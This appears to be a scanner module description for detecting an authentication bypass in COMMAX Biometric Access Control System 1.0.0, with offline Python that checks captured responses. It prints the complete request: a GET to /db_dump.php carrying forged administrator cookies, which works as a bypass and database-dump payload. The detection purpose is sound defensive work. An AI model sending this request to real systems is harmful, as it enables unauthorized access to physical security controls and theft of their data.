By kannthu
The "COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass" module is designed to detect an authentication bypass vulnerability in the COMMAX Biometric Access Control System version 1.0.0. This vulnerability allows unauthorized access to the system, compromising its security. The severity of this vulnerability is classified as critical.
If exploited, this vulnerability can lead to unauthorized access to the COMMAX Biometric Access Control System. Attackers can bypass the authentication mechanism and gain control over the system, potentially compromising the security of the premises it is protecting.
The module works by sending an HTTP request to the target system and analyzing the response. It checks for specific conditions to determine if the authentication bypass vulnerability is present. The request template used by the module is as follows:
```
GET /db_dump.php HTTP/1.1
Host: {%Hostname%}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: /user_add.php
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
```
The module then applies the following matching conditions to the response:
- The response body must contain the HTML title tag "::: COMMAX :::".
- The response header must include the word "text/html".
- The HTTP status code must be 200.
If all the matching conditions are met, the module identifies the presence of the authentication bypass vulnerability.
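The three matching conditions above, applied offline to already-captured responses, look like this in Python. This is an added example, not Vidoc's module code; the `<title>` markup assumed around the string, the function names and the sample responses are constructed for illustration.

```python
import re

# Assumption: the title matcher corresponds to this markup in the body.
TITLE_RE = re.compile(r"<title>\s*::: COMMAX :::\s*</title>", re.IGNORECASE)

def parse_response(raw):
    """Split a raw HTTP/1.x response into (status, header block, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, _, header_block = head.partition("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/") or not parts[1].isdigit():
        raise ValueError("malformed status line: %r" % status_line)
    return int(parts[1]), header_block, body

def evaluate(raw):
    """Apply the module's three conditions; all must hold for a finding."""
    status, headers, body = parse_response(raw)
    checks = {
        "title": TITLE_RE.search(body) is not None,
        "content_type": "text/html" in headers.lower(),
        "status": status == 200,
    }
    checks["finding"] = all(checks.values())
    return checks

# Constructed sample responses (not captured from a real device).
SAMPLES = {
    "served_without_login": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
        "<html><head><title>::: COMMAX :::</title></head><body></body></html>",
    "redirected": "HTTP/1.1 302 Found\r\nLocation: /\r\n"
        "Content-Type: text/html\r\n\r\n",
    "other_200_page": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
        "<html><head><title>It works</title></head></html>",
    "title_but_download": "HTTP/1.1 200 OK\r\n"
        "Content-Type: application/octet-stream\r\n\r\n"
        "<title>::: COMMAX :::</title>",
}

def report():
    """Evaluate every sample and return the per-condition results."""
    return {name: evaluate(raw) for name, raw in SAMPLES.items()}

if __name__ == "__main__":
    for name, result in report().items():
        print(name, result)
```

The per-condition results show which matcher failed, which helps when confirming that a fix or access restriction has changed what `/db_dump.php` returns.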
This module is a valuable tool for security professionals and system administrators to identify and mitigate the authentication bypass vulnerability in the COMMAX Biometric Access Control System 1.0.0.